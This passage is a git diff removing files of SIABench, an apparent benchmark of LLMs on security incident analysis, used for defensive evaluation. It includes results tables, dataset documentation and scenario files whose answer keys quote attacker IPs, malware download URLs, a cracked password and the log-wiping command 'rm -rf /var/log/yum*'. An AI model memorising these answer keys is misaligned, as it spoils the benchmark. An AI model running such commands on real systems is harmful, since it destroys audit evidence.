[CIC-IDS2017](https://www.unb.ca/cic/datasets/ids-2017.html) and [TII-SRC-23](https://ieeexplore.ieee.org/abstract/document/10262330) dataset. We carefully reviewed the terms of use associated with both CIC-IDS2017 and TII-SRC-23, which permit free usage for research and academic purposes. In accordance with these terms, we acknowledge the dataset, and cite the corresponding publications. - -## Benefits and Positive Outcomes - -By establishing an evaluation benchmark, our work highlights both the strengths and weaknesses of large language models (LLMs) in SIA tasks. It provides insights into where these models excel, where they struggle, and offers analyses of the reasons behind their failures—ultimately identifying areas that need further improvement to perform SIA tasks. While these findings are valuable, we acknowledge that some stakeholders may perceive them as a deterrent to rapid AI adoption, especially since the evaluation data clearly show that some models outperform others, and in certain contexts LLMs may not yet be mature enough. However, hasty adoption can backfire, resulting in financial losses, reputational harm, or even legal issues, particularly given the high-stakes nature of deploying AI in cyber defence. Therefore, our goal is to help the stakeholders make better-informed decisions by understanding the capabilities and limitations of LLMs in performing SIA tasks, thereby ensuring a more reliable return on investment. This knowledge also empowers them to critically assess AI tools, identify potential remedies or workarounds, and adopt them more responsibly. Interestingly, commercial companies like Anthropic have also recognized the value of public benchmarks, such as [Cybench](https://arxiv.org/abs/2408.08926), using them alongside internal evaluations and publishing the results in their reports. Having accessible means of independent validation fosters greater trust in AI models as well as the products built on top of them - leading to more robust and reliable use of AI in the long run. - -## Risk Assessment and Mitigation - -We also acknowledge the potential risk of misuse associated with releasing our data, agent, and results. Malicious actors could adapt the agent for adversarial purpose. The results as well could inform them about the current capabilities of LLMs in solving SIA tasks, which knowledge could be exploited to deceive cyber defenders. However, given the existence of publicly available Capture The Flag (CTF) and penetration testing benchmarks and agents, we believe the risk of adapting our agent for adversarial purpose is low. Additionally, malicious actors may obtain similar technology through covert means. For these reasons, we believe accelerating cyber defense through advanced technologies like LLMs is critical. Our results track the progress of current LLMs on SIA tasks, identifies gaps, which would accelerate and foster the development of stronger AI agents for cyber defense. - -## Transparency and Reproducibility - -In addition, as researchers, we prioritize transparency and reproducibility. By sharing our data, agent, and results, we aim to support the broader community in validating and building upon our work. Although due to the [inherent variability](https://arxiv.org/abs/2501.19393) in LLM outputs, full replication of our results may not always be possible. - -## Conclusion - -After weighing the benefits such as advancing progress, informing stakeholders and policymakers, and enabling transparency and reproducibility over potential risks, we decided to publicly release our dataset, agent, and results. Note that the agent source code will be available upon acceptance of the paper. diff --git a/SIABench-main/README.md b/SIABench-main/README.md deleted file mode 100644 index 045a7056533a38eb983d906163b551022171682a..0000000000000000000000000000000000000000 --- a/SIABench-main/README.md +++ /dev/null @@ -1,225 +0,0 @@ -# SIABench 🚀 - -Welcome to the **SIABench** repository! This benchmark is designed for **Security Incident Analysis** tasks, encompassing various cybersecurity investigation domains such as **Memory Forensics, Malware Analysis, Network Forensics, and more.** - -## Overview - -SIABench consists of two main components: - -- **Part I: SIA Tasks** - Simulates the in-depth investigation process of SIA tasks with **25 unique security scenarios** containing **229 investigative questions** in total -- **Part II: Alert Triage** - Includes true and false positives for evaluating classification tasks with **135 alert scenarios** and **135 questions** in total (for the time being, only the alerts generated from CIC-IDS2017 network traffic are included in this repo). - -We evaluate different LLMs with our dataset using the [🤖 SIABench Agent]. - ---- - -## 📊 Performance Evaluation on SIA Dataset - -### Summary Results - -| Model | Fully Solved Scenarios (FS) | Overall Solving Percentage (%) | -|-------|-----------------------------|---------------------------------| -| Claude-4.5-Sonnet | 8/25 | 81.7% | -| GPT-5 | 5/25 | 80.7% | -| Claude-3.5-Sonnet | 4/25 | 71.03% | -| GPT-4.0 | 3/25 | 57.93% | -| DeepSeek-Reasoner | 1/25 | 49.33% | -| Gemini1.5-pro | 1/25 | 41.61% | -| OpenAI-o3-mini | 1/25 | 41.1% | -| GPT-4.0mini | 1/25 | 32.53% | -| Llama3.1-405B | 0/25 | 23.65% | -| Llama3.1-70B | 0/25 | 16.53% | -| Llama3.1-8B | 0/25 | 7.03% | - -### Detailed Results by Category - -
-📊 Click to view the detailed breakdown by category and difficulty - -| Model | NF-E (3S) | NF-M (4S) | NF-H (1S) | MF-E (4S) | MF-M (2S) | MF-H (1S) | MA-E (2S) | MA-M (3S) | MA-H (1S) | MS-E (3S) | MS-M (1S) | MS-H | 🌟**Overall** | -|-------|-----------|-----------|-----------|-----------|-----------|-----------|-----------|-----------|-----------|-----------|-----------|------|----------------| -| **Llama3.1-8B** | 0/3 (8.33%) | 0/4 (0%) | 0/1 (0%) | 0/4 (2.27%) | 0/2 (0%) | 0/1 (0%) | 0/2 (25%) | 0/3 (0%) | 0/1 (0%) | 0/3 (27.5%) | 0/1 (9.09%) | — | **0/25 (7.03%)** | -| **Llama3.1-70B** | 0/3 (17.5%) | 0/4 (15.08%) | 0/1 (0%) | 0/4 (14.09%) | 0/2 (5%) | 0/1 (0%) | 0/2 (26.67%) | 0/3 (6.67%) | 0/1 (8.33%) | 0/3 (47.78%) | 0/1 (9.09%) | — | **0/25 (16.53%)** | -| **Llama3.1-405B** | 0/3 (31.79%) | 0/4 (19.07%) | 0/1 (10%) | 0/4 (24.09%) | 0/2 (5%) | 0/1 (0%) | 0/2 (43.33%) | 0/3 (10.26%) | 0/1 (16.67%) | 0/3 (53.33%) | 0/1 (9.09%) | — | **0/25 (23.65%)** | -| **GPT-4.0** | 0/3 (64.05%) | 0/4 (43.17%) | 0/1 (40%) | 1/4 (61.47%) | 0/2 (60%) | 0/1 (33.33%) | 1/2 (80%) | 0/3 (58.97%) | 0/1 (16.67%) | 1/3 (84.72%) | 0/1 (36.36%) | — | **3/25 (57.93%)** | -| **GPT-4.0mini** | 0/3 (29.29%) | 0/4 (26.49%) | 0/1 (20%) | 0/4 (33.14%) | 0/2 (18.33%) | 0/1 (0%) | 0/2 (73.33%) | 0/3 (18.46%) | 0/1 (16.67%) | 1/3 (58.33%) | 0/1 (36.36%) | — | **1/25 (32.53%)** | -| **Gemini1.5-pro** | 0/3 (62.98%) | 0/4 (31.79%) | 0/1 (20%) | 0/4 (33.35%) | 0/2 (31.67%) | 0/1 (6.67%) | 0/2 (73.33%) | 0/3 (25.13%) | 0/1 (16.67%) | 1/3 (72.22%) | 0/1 (45.45%) | — | **1/25 (41.61%)** | -| **DeepSeek-Reasoner** | 0/3 (70.12%) | 0/4 (36.29%) | 0/1 (30%) | 0/4 (50.88%) | 0/2 (38.33%) | 0/1 (26.67%) | 1/2 (70%) | 0/3 (48.72%) | 0/1 (33.33%) | 0/3 (61.67%) | 0/1 (36.36%) | — | **1/25 (49.33%)** | -| **OpenAI-o3-mini** | 0/3 (72.14%) | 0/4 (41.91%) | 0/1 (40%) | 0/4 (31.24%) | 0/2 (15%) | 0/1 (13.33%) | 0/2 (53.33%) | 0/3 (25.13%) | 0/1 (25%) | 1/3 (63.89%) | 0/1 (36.36%) | — | **1/25 (41.1%)** | -| **Claude-4.5-Sonnet** | 0/3 (87.74%) | 1/4 (86.12%) | 1/1 (100%) | 2/4 (86.74%) | 1/2 (85%) | 0/1 (33.33%) | 0/2 (81.67%) | 1/3 (80.51%) | 0/1 (41.67%) | 2/3 (94.44%) | 0/1 (54.55%) | — | **8/25 (81.7%)** | -| **GPT-5** | 1/3 (92.5%) | 0/4 (84.92%) | 0/1 (90%) | 2/4 (86.04%) | 0/2 (81.67%) | 0/1 (26.67%) | 1/2 (91.67%) | 0/3 (76.41%) | 0/1 (41.67%) | 1/3 (86.11%) | 0/1 (63.64%) | — | **5/25 (80.7%)** | - -
- -### Legend - -- **FS** = Fully Solved Scenario -- **PS** = Partially Solved Scenarios (Average Percentage) -- **S** = Scenarios, **Q** = Questions - -**Category Abbreviations:** -- **MF** = Memory Forensics -- **MA** = Malware Analysis -- **NF** = Network Forensics -- **MS** = Miscellaneous - -**Difficulty Levels:** -- **E** = Easy -- **M** = Medium -- **H** = Hard - ---- - -## 🔬 Optimized Performance with Model Combinations - -While individual models show varying performance across different scenarios, our analysis reveals that **strategic model combination** can significantly improve overall performance. Different models excel at different types of security investigation tasks, and leveraging their complementary strengths leads to better results. - -### 🎯 Ensemble Analysis: DeepSeek-Reasoner & o3-mini - -We conducted a comprehensive ensemble analysis combining **DeepSeek-Reasoner** and **o3-mini** to explore different optimization strategies: - -#### Individual Baseline Performance -- **DeepSeek-Reasoner**: 48.03% (110/229 questions) -- **o3-mini**: 40.61% (93/229 questions) - -#### Oracle Performance (Theoretical Upper Bound) -When at least one model answers correctly: **58.52% (134/229 questions)** - -This represents a **+10.48% improvement** over the best individual model, demonstrating significant complementary capabilities: -- Both models correct: 69 questions (30.13%) -- Only o3-mini correct: 24 questions (10.48%) -- Only DeepSeek correct: 41 questions (17.90%) -- Both models incorrect: 95 questions (41.48%) - -#### Practical Optimization Strategies - -**1. Scenario-Based Routing (Best: 51.97%)** - -Select the optimal model for each security scenario type: -- **o3-mini excels at**: PsExec (71.43%), HawkEye (66.67%), Network Forensics scenarios -- **DeepSeek-Reasoner excels at**: Malware Analysis (Ramnit 50%, XLM_Macro 46.15%), Obfuscated code (80%), Port scanning (80%), Tomcat exploitation (87.5%) - -**2. Task Category-Based Routing (49.78%)** - -Route questions based on investigation domain: -- **Network Forensics** → o3-mini (54.02% vs 49.43%) -- **Malware Analysis** → DeepSeek-Reasoner (50.00% vs 30.43%) -- **Memory Forensics** → DeepSeek-Reasoner (41.67% vs 25.00%) -- **Miscellaneous** → DeepSeek-Reasoner (52.78% vs 47.22%) - -**3. Difficulty-Based Routing (48.03%)** - -All difficulty levels favor DeepSeek-Reasoner: -- Easy questions: 61.11% vs 52.22% -- Medium questions: 43.14% vs 36.27% -- Hard questions: 29.73% vs 24.32% - -### 📊 Performance Comparison Summary - -| Strategy | Performance | Improvement | -|----------|-------------|-------------| -| **Oracle (Either correct)** | 58.52% | +10.48% | -| **Scenario-Based Ensemble** | 51.97% | +3.93% | -| **Task Category Ensemble** | 49.78% | +1.75% | -| **Difficulty-Based Ensemble** | 48.03% | +0.00% | -| DeepSeek-Reasoner (single) | 48.03% | baseline | -| o3-mini (single) | 40.61% | -7.42% | - -### 💡 Key Insights - -1. **Complementary Strengths**: The 10.48% oracle improvement shows significant non-overlapping capabilities between models -2. **Scenario-Specific Excellence**: Different models excel at different attack types and investigation scenarios -3. **Practical Gains**: Scenario-based routing achieves 75% of the theoretical oracle improvement with practical implementation -4. **Domain Specialization**: o3-mini shows strength in network analysis, while DeepSeek-Reasoner excels at malware and memory forensics - ---- - -## 📊 Performance Evaluation on Alert Triaging Dataset - -> **📢 Note:** The TII-SRC-23 dataset will be uploaded soon! - -### TII-SRC-23 Dataset (50 TP and 50 FP) - -| Model | True Positives (TP) | False Positives (FP) | Accuracy | -|-------|---------------------|----------------------|----------| -| GPT-5 | 48/50 (96.00%) | 50/50 (100.00%) | 98.00% | -| Claude-4.5-Sonnet | 50/50 (100.00%) | 46/50 (92.00%) | 96.00% | -| DeepSeek-Reasoner | 47/50 (94.00%) | 42/50 (84.00%) | 89.00% | -| GPT-4.0mini | 43/50 (86.00%) | 32/50 (64.00%) | 75.00% | - -### CIC-IDS2017 Dataset (5 TP and 30 FP) - -| Model | True Positives (TP) | False Positives (FP) | Accuracy | -|-------|---------------------|----------------------|----------| -| GPT-5 | 4/5 (80.00%) | 30/30 (100.00%) | 97.14% | -| Claude-4.5-Sonnet | 4/5 (80.00%) | 27/30 (90.00%) | 88.57% | -| DeepSeek-Reasoner | 4/5 (80.00%) | 26/30 (86.67%) | 85.71% | -| GPT-4.0mini | 4/5 (80.00%) | 14/30 (46.67%) | 51.43% | - ---- - -## 🏆 Leaderboard - -**📊 [View Interactive Leaderboard](https://llm-leaderboard-f4z.pages.dev/)** - -Explore detailed performance metrics and comparisons across all models on our interactive leaderboard! 🚀 - ---- - -## 🧠 Model Integrations - -### ✅ Evaluated Models - -SIA Agent has been tested and integrated with **11 popular LLMs**: - -| Model | Provider | API Documentation | -|-------|----------|-------------------| -| Claude-4.5-Sonnet | Anthropic | [Claude API](https://docs.anthropic.com/en/docs/about-claude/models/all-models) | -| GPT-5 | OpenAI | [OpenAI API](https://platform.openai.com/docs/overview) | -| Claude-3.5-Sonnet | Anthropic | [Claude API](https://docs.anthropic.com/en/docs/about-claude/models/all-models) | -| GPT-4.0 | OpenAI | [OpenAI API](https://platform.openai.com/docs/overview) | -| DeepSeek-Reasoner | DeepSeek | [DeepSeek API](https://www.deepseek.com/en) | -| Gemini1.5-pro | Google | [Google Gemini API](https://ai.google.dev/) | -| OpenAI-o3-mini | OpenAI | [OpenAI API](https://platform.openai.com/docs/overview) | -| GPT-4.0mini | OpenAI | [OpenAI API](https://platform.openai.com/docs/overview) | -| Llama3.1-8B | Meta | [Fireworks API](https://fireworks.ai/models) | -| Llama3.1-70B | Meta | [Fireworks API](https://fireworks.ai/models) | -| Llama3.1-405B | Meta | [Fireworks API](https://fireworks.ai/models) | - ---- - -## 📂 Repository Structure - -```plaintext -SIABench/ -├── SIA_Dataset/ # Contains JSON files with SIA scenarios -│ ├── SIA_Dataset.md # Dataset structure and format documentation -│ └── [scenario files...] # JSON files with security scenarios -├── Alert_Triaging_Dataset/ # Contains JSON files with Alert triaging scenarios -│ ├── Alert_Triaging_Dataset.md # Dataset structure and format documentation -│ └── [scenario files...] # JSON files with security scenarios -├── ETHICS.md # Ethics statement and responsible use guidelines -└── README.md # This file -``` - -### 📋 Dataset Documentation - -For detailed information about the SIA and Alert Triaging dataset structure, format, and examples, please refer to: -- **[SIA_Dataset.md](./SIA_Dataset/SIA_Dataset.md)** - Complete documentation of the SIA dataset structure, question types, and data format -- **[Alert_Triaging_Dataset.md](./Alert_Triaging_Dataset/Alert_Triaging_Dataset.md)** - Complete documentation of the Alert Triaging dataset structure, question types, and data format - -### 🛡️ Ethics and Responsible Use - -Please review our **[Ethics Statement](./ETHICS.md)** which covers: -- Data compliance and curation practices -- Risk assessment and mitigation strategies -- Responsible use guidelines for researchers and practitioners - ---- - -## 🌟 Acknowledgments - -- The [LangChain](https://www.langchain.com/) community -- Security researchers who continue to push boundaries in automated incident analysis - ---- diff --git a/SIABench-main/SIA_Dataset/SIA_Dataset.md b/SIABench-main/SIA_Dataset/SIA_Dataset.md deleted file mode 100644 index 4027d7e1f23fd405dd01d505ca1c22ff83c61a03..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/SIA_Dataset.md +++ /dev/null @@ -1,156 +0,0 @@ - - -## 🎯 Overview - -The following JSON format provides a standardized structure for security incident analysis scenarios. This format enables **Automated evaluation** of LLM agents in SIA tasks. - -The format separates input data (provided to LLM agents) from evaluation data (used for scoring), ensuring fair and comprehensive assessment. - ---- - -## 🏗️ Root Structure - -```json -{ - "scenarios": [ - { - "metadata": { "..." }, - "sia_components": { "..." } - } - ] -} -``` - -**Key Points:** - -- Root object contains a `scenarios` array -- Each scenario is self-contained with all necessary information -- Each scenario represents a complete cybersecurity incident or challenge - ---- - -## 🧩 Scenario Object Components - -Each scenario object consists of two main sections that serve distinct purposes: - -### 🔖 Metadata Section - -Contains reference information about the scenario source. - -```json -"metadata": { - "source": "https://example.com/challenge", - "scenario_name": "unique_scenario_identifier", - "last_accessed": "June 04, 2025", - "writeup": "https://example.com/solution" -} -``` - -| Field | Type | Purpose | Example | -| --------------- | ------ | ------------------------------------ | -------------------------------------------------- | -| `source` | String | Original challenge URL or reference | `"https://cyberdefenders.org/blueteam-ctf-challenges/bluesky-ransomware/"` | -| `scenario_name` | String | Unique identifier for the scenario | `"BlueSky"` | -| `last_accessed` | String | Date when scenario was last accessed | `"June 04, 2025"` | -| `writeup` | String | Link to solution documentation | `"https://h05am10.gitbook.io/h05am10/write-ups/cyberdefenders/network-forensics/bluesky-ransomware"` | - -### 🧪 SIA Components Section - -Contains the core scenario data, questions, and evaluation fields. - -```json -"sia_components": { - "scenario": "...", - "tools_available": ["..."], - "files_available": ["..."], - "instructions": "...", - "directory": "...", - "questions": ["..."], - "task_category": "...", - "complexity": "...", -} -``` - -The `questions` array contains three components: - -```json -{ - "question": "", - "answer": "", - "adversarial_tactic": "" -} -``` -## 📊 Component Categories - -The SIA components are strategically divided into two categories to maintain evaluation integrity: - -### 🔵 LLM Input Components - -**Purpose:** Information provided to the LLM agent for solving the task. - -#### Core Fields: - -| Field | Type | Description | -| ----------------- | ------ | -------------------------------------- | -| `scenario` | String | An incident scenario description | -| `tools_available` | Array | List of available suggested command-line tools | -| `files_available` | Array | Files provided for analysis | -| `instructions` | String | Environment setup and usage guidelines | -| `directory` | String | Working directory path | -| `question` | String | List of questions to be answered by the LLM | - -#### Example: - -```json -{ - "scenario": "A major corporation responsible for vital data...", - "tools_available": ["tshark", "python", "grep", "strings", "..."], - "files_available": ["capture.pcap"], - "instructions": "You are working in a Kali Linux environment. Use the provided tools to analyze the files.", - "directory": "/home/analyst/investigation", - "question": ["Is there any evidence of port scanning in the network traffic? If so, what is the IP address responsible for the scanning activity?, ..."] -} -``` - -### 🔴 Evaluation Components - -**Purpose:** Ground truth data used exclusively for automated scoring - -#### Core Fields: - -| Field | Type | Description | -| -------------------- | ------ | ----------------------------------- | -| `task_category` | String | Type of cybersecurity analysis | -| `complexity` | String | Difficulty level (Easy/Medium/Hard) | -| `answer` | String | Expected correct answer | -| `adversarial_tactic` | String | MITRE ATT&CK framework mapping | - -#### Task Categories: -- **Memory Forensics** - includes tasks requiring the LLMs -to inspect disk images or examine memory dumps. -- **Malware Analysis** - includes tasks, such as malicious file -analysis (PDF, XML, binary, etc.), static code review, and -inspecting ransomware scripts. -- **Network Forensics** - includes tasks requiring the LLMs -to analyze malicious network traffic, such as PCAP files. -- **Miscellaneous** - includes other tasks such as the analysis -of phishing e-mails, log files, and phishing kits. - -### 🗂️ Artifacts Availability - -There are primarily two ways of downloading the files/artifacts: - -1. **GitHub Repository** - Some artifacts are available in this repository: - [Cyber-Defenders Repository](https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main) - Licensed under **AGPL-3.0**. - -2. **Blue Team Training Platforms** - - [Blue Team Labs Online (BTLO)](https://blueteamlabs.online/) - - [CyberDefenders](https://cyberdefenders.org/) - - [TryHackMe](https://tryhackme.com/) - - Following their **Terms & Conditions**, we do not host their artifacts. - Instead, we reference the **source challenge links (URLs)** in our JSON files for each scenario. - - Artifacts can be downloaded freely by signing up (no payment or subscription required). - - These are **free, retired challenges**. - - Each free scenario has a **public writeup** available. diff --git a/SIABench-main/SIA_Dataset/bluesky.json b/SIABench-main/SIA_Dataset/bluesky.json deleted file mode 100644 index 265a31343e386c5beaa1c5dff63c3f31d7ca563c..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/bluesky.json +++ /dev/null @@ -1,110 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/bluesky-ransomware/", - "scenario_name": "BlueSky", - "last_accessed": "June 04, 2025", - "writeup": "https://h05am10.gitbook.io/h05am10/write-ups/cyberdefenders/network-forensics/bluesky-ransomware" - } - }, - { - "sia_components": { - "scenario": "A major corporation responsible for vital data and services across multiple industries has disclosed a serious cybersecurity event. Their network was recently affected by a suspected ransomware assault. Critical files have been locked, leading to disruptions and concerns over possible data breaches. Initial indicators suggest the attack was carried out by an advanced threat actor. Your role is to examine the available evidence, identify the attackers' techniques, evaluate the breach's scope, and assist in mitigating the threat to restore the network's integrity.", - "task_category": "Network Forensics", - "complexity": "Medium", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Is there any evidence of port scanning in the network traffic? If so, what is the IP address responsible for the scanning activity?", - "answer": "87.96.21.84", - "adversarial_tactic": "Reconnaissance: Port scanning is part of the initial reconnaissance phase to identify open ports and services." - }, - { - "question": "2. Is there any user account targeted for unauthorized access in the capture file? If so, what is the targeted account username?", - "answer": "sa", - "adversarial_tactic": "Initial Access: Adversaries may obtain and abuse credentials of existing accounts to gain unauthorized access." - }, - { - "question": "3. Did the attacker succeed in gaining access. If so, can you provide the correct password discovered by the attacker?", - "answer": "cyb3rd3f3nd3r$", - "adversarial_tactic": "Initial Access: Adversaries may obtain and abuse credentials of existing accounts to gain unauthorized access." - }, - { - "question": "4. Attackers often change some settings to facilitate lateral movement within a network. Do you think if there is any change, if so, what setting did the attacker enable to control the target host further and execute further commands?", - "answer": "xp_cmdshell", - "adversarial_tactic": "Lateral Movement: Enabling specific settings facilitates unauthorized control over the network." - }, - { - "question": "5. Process injection is often used by attackers to escalate privileges within a system. Is there any process the attacker injected the C2 into to gain administrative privileges?", - "answer": "winlogon.exe", - "adversarial_tactic": "Privilege Escalation: Injecting into processes is used to escalate privileges and maintain persistence." - }, - { - "question": "6. Is there any record of a file being downloaded by the attacker? If so, what is the URL of the downloaded file?", - "answer": "http://87.96.21.84/checking.ps1", - "adversarial_tactic": "Execution: Downloading malicious scripts is part of executing a payload." - }, - { - "question": "7. Is there any specific group or security identifier (SID) that is checked by the malicious script to confirm user privileges? If so, what is the SID?", - "answer": "S-1-5-32-544", - "adversarial_tactic": "Discovery: Checking SIDs helps attackers identify privileged accounts for further exploitation." - }, - { - "question": "8. Is there any indication of registry modifications by the attacker? If so, what are the registry keys used by the attacker to disable Windows Defender functionalities?", - "answer": "DisableAntiSpyware, DisableRoutinelyTakingAction, DisableRealtimeMonitoring, SubmitSamplesConsent, SpynetReporting", - "adversarial_tactic": "Defense Evasion: Disabling Windows Defender weakens the system's defenses." - }, - { - "question": "9. Is there any evidence of second file downloaded by the attacker? If so, what is the URL?", - "answer": "http://87.96.21.84/del.ps1", - "adversarial_tactic": "Execution: Downloading script files is part of executing secondary payloads." - }, - { - "question": "10. Is there any evidence of scheduled tasks created by the attacker? If so, what is the name of the scheduled task to maintain persistence on the system?", - "answer": "Microsoft/Windows/MUI/LPupdate", - "adversarial_tactic": "Persistence: Scheduled tasks help attackers maintain access to the system." - }, - { - "question": "11. Is there any evidence of credential dumping by the attacker? If so, is there any invoked script used by the attacker for dumping credentials?", - "answer": "invoke-powerdump.ps1", - "adversarial_tactic": "Credential Access: Dumping credentials is essential for further exploitation." - }, - { - "question": "12. Is there any saved file containing the dumped credentials? If so, what is the name of the file?", - "answer": "hashes.txt", - "adversarial_tactic": "Credential Access: Saved credentials are critical for adversary exploitation." - }, - { - "question": "13. Is there a file that contains a list of discovered hosts on the network? If so, what is the name of the file?", - "answer": "extracted_hosts.txt", - "adversarial_tactic": "Discovery: Listing discovered hosts helps attackers identify potential targets." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/btlo_port_scanning.json b/SIABench-main/SIA_Dataset/btlo_port_scanning.json deleted file mode 100644 index a8c45152c9dbe35942966258cc097c4ba7a050f7..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/btlo_port_scanning.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://blueteamlabs.online/home/challenge/network-analysis-web-shell-d4d3a2821b", - "scenario_name": "Btlo_port_scanning", - "last_accessed": "June 04, 2025", - "writeup": "https://medium.com/btlo-investigation-solutions/btlo-network-analysis-web-shell-9fa8d3135b6" - } - }, - { - "sia_components": { - "scenario": "An analyst detects unusual network activity suggesting that an internal host is scanning another internal system, raising concerns of a potential port scanning activity. A PCAP file, capture.pcap, has been provided to determine if this is a benign network scan or an indicator of compromise. Your task is to analyze the provided pcap file and extract relevant information to understand the attack.", - "task_category": "Network Forensics", - "complexity": "Easy", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Based on the network traffic, is there any indication of port scanning activity?", - "answer": "Yes, the network traffic shows clear indications of port scanning activity.", - "adversarial_tactic": "Reconnaissance: Port scanning is commonly used for identifying open ports and is part of reconnaissance activities to gather information about a target system." - }, - { - "question": "2. If there is port scanning activity, can you identify the IP address responsible for conducting the port scanning activity?", - "answer": "10.251.96.4", - "adversarial_tactic": "Reconnaissance: Identifying the source of reconnaissance activity, such as port scanning, helps understand how adversaries gather information about the network." - }, - { - "question": "3. Can you identify the range of ports that were scanned by the suspicious host?", - "answer": "1-1024", - "adversarial_tactic": "Reconnaissance: This question further characterizes the reconnaissance activity, providing insight into the adversary scanning methods." - }, - { - "question": "4. Can you determine the type of port scan conducted by the suspicious host?", - "answer": "SYN scan or TCP SYN scan", - "adversarial_tactic": "Reconnaissance: Understanding the type of port scan (e.g., SYN scan) provides additional detail on the reconnaissance technique." - }, - { - "question": "5. Can you identify if there are any additional tools used to perform reconnaissance against open ports? If so, what were they?", - "answer": "gobuster 3.0.1 and sqlmap 1.4.7.", - "adversarial_tactic": "Reconnaissance: Identifying tools used in reconnaissance can reveal an adversary's resources or tools used to gather information about the target." - }, - { - "question": "6. Based on the network traffic, Is there any indication of web shell upload? If so, what is the name of the uploaded web shell? ", - "answer": "dbfunctions.php", - "adversarial_tactic": "Execution: Web shells are used to execute commands on a target system, indicating a more advanced stage of compromise." - }, - { - "question": "7. If there is any indication of web shell upload in the traffic, can you identify any file through which the attacker uploaded the web shell? If so, what is the file name?", - "answer": "editprofile.php", - "adversarial_tactic": "Initial Access: Through the file upload, the attacker may attempt to gain initial access to the target system." - }, - { - "question": "8. Can you identify if the attacker execute any commands through the web shell? If so, what parameter is used for command execution? ", - "answer": "'cmd'", - "adversarial_tactic": "Execution: The execution of commands through a web shell shows that the attacker has achieved command execution, likely attempting to carry out further operations." - }, - { - "question": "9. Can you identify if there is any kind of shell connection is established by the attacker to the compromised system? If so, what type of shell connection is it?", - "answer": "reverse shell", - "adversarial_tactic": "Command and Control (C2): Establishing a reverse shell indicates that the attacker has set up a command and control channel to maintain a persistent connection to the target system." - }, - { - "question": "10. From the shell connection initiated by the attacker, can you identify if there are any ports used for the shell connection? If so, what is the port number used for the shell connection?", - "answer": "4422", - "adversarial_tactic": "Command and Control (C2): Determining the port used for a reverse shell provides insight into the command and control mechanism, which is crucial for identifying and blocking potential C2 channels." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/btlo_ransomware_script.json b/SIABench-main/SIA_Dataset/btlo_ransomware_script.json deleted file mode 100644 index f0eda8d7b9e7129abdc796b3bdf8029931030c3a..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/btlo_ransomware_script.json +++ /dev/null @@ -1,82 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://blueteamlabs.online/home/challenge/malware-analysis-ransomware-script-4263fe6ecf", - "scenario_name": "BTLO_Ransomware_Script", - "last_accessed": "June 04, 2025", - "writeup": "https://medium.com/@ERBATMAN/blue-team-labs-malware-analysis-ransomware-script-6d5ecb2a2496" - } - }, - { - "sia_components": { - "scenario": "A recent ransomware attack compromised one of our web servers. Fortunately, a restore point created shortly before the encryption allowed us to recover the system. Among the restored files was a suspicious script that appears to have not been executed yet.", - "task_category": "Malware Analysis", - "complexity": "Easy", - "files_available": [ - "script.txt" - ], - "tools_available": [ - "tshark", - "python", - "md5sum", - "curl", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "tr", - "base64", - "cd", - "whois" - ], - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify any IP address that appears repeatedly and may seem to be suspicious? If so, what is the IP address?", - "answer": "185.141.25.168", - "adversarial_tactic": "Command and Control (C2): Repeated IP addresses may indicate an external server used for command and control communication." - }, - { - "question": "2. In script.txt, can you identify if any package management commands used to retrieve or install tools? If the script attempts to delete any logs afterward, and if so, what command is used?", - "answer": "rm -rf /var/log/yum*", - "adversarial_tactic": "Defense Evasion: Deleting logs suggests an attempt to cover tracks, while package management may point to tool acquisition by adversaries." - }, - { - "question": "3. Can you find any message written to /etc/motd for any contact information provided by the attacker. If any email address is included, provide it here.", - "answer": "nationalsiense@protonmail.com", - "adversarial_tactic": "Impact: Contact information in the message can be used by attackers to negotiate ransom payments or communicate with victims." - }, - { - "question": "4. Can you identify if there an unusual file extension used when files are encrypted? If so, what is it?", - "answer": "☢", - "adversarial_tactic": "Impact: Unique file extensions are typically added to encrypted files as part of ransomware's impact on the system." - }, - { - "question": "5. Can you identify any function names related to encryption in the script? If so, provide the function names.", - "answer": "encrypt_ssh, encrypt_grep_files, encrypt_home, encrypt_root, encrypt_db", - "adversarial_tactic": "Impact: Identifying encryption functions can help understand the ransomware's behavior and its impact on the system." - }, - { - "question": "6. Can you identify if the script includes any URLs used to check or communicate with an external server for a file. If so, what is the URL?", - "answer": "http://185.141.25.168/check_attack/0.txt", - "adversarial_tactic": "Command and Control (C2): External URLs in scripts can signify a command and control server used to communicate with compromised machines." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/btlo_wordpress.json b/SIABench-main/SIA_Dataset/btlo_wordpress.json deleted file mode 100644 index f6e0084a985b69fbd75f175552afbe0c0240f238..0000000000000000000000000000000000000000 --- 